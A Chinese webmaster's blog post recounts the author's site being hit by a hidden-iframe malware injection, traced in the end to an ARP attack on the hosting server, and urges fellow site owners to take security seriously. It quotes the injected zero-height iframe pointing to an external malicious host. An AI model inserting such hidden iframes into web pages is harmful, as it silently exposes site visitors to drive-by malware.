今天中午,我的网站经历了一场生死大劫:打开网页奇慢……文章内页只显示头文件和标题,不显示内容和尾文件……管理路径打不开……勉强打开的网页查了源代码,发现一行可疑代码:<iframe src=http://c.j8j8.biz/103/ width=100 height=0></iframe>……迷糊,我的网站被挂马了!!!
首先我在想,我的站怎么会被挂马,想起自己在多个贴吧留了自己的网址,可能是暴露网站树敌的因素。查了网站统计:有日本IP的访问,并登陆了很多界面,从注册到用户中心管理,都有迹象。之后就是最近的访问IP,网站就出现问题了。难道……嗯,应该想办法解决……找备份文件……先应恢复网页的正常访问。
但是备份文件没有在手里,怎么办,先联系空间提供商吧。QQ联系——回复:技术员还没有回来——我的网页依旧挂马——头痛……难道自己的网站就这么瘫了?没办法,自己先去查查问题吧:查数据库连接文件,没有可疑代码;头尾文件,没有可以代码;大文件夹,同样没有……哎,真可恨,难道把木马植入每个页面了?
不堪想像!
……
过了有半个小时,再次访问我的站点:奇迹,恢复正常了!空间提供商回复:刚刚服务器遭受攻击,有ARP攻击……哈哈,虚惊一场,原来是空间的问题……不知道有多少站长同胞遇到过这样的问题。网站被攻击应该是家常便饭,服务器遭受攻击,也应该平常视之……原来,自己以前的小站太过安逸了。暴风雨会让自己的小站经受洗礼的。不过,安全问题的确是大问题。希望读过这篇文章的站长同胞,把自己的网站和服务器的安全问题重视起来。如果小的不经意,真的会有大的损失!
欢迎对 www.e0435.com 进行安全指导!向战斗在黑防一线的网警和站长同胞们致敬!
时间: 2024-10-13 10:52:33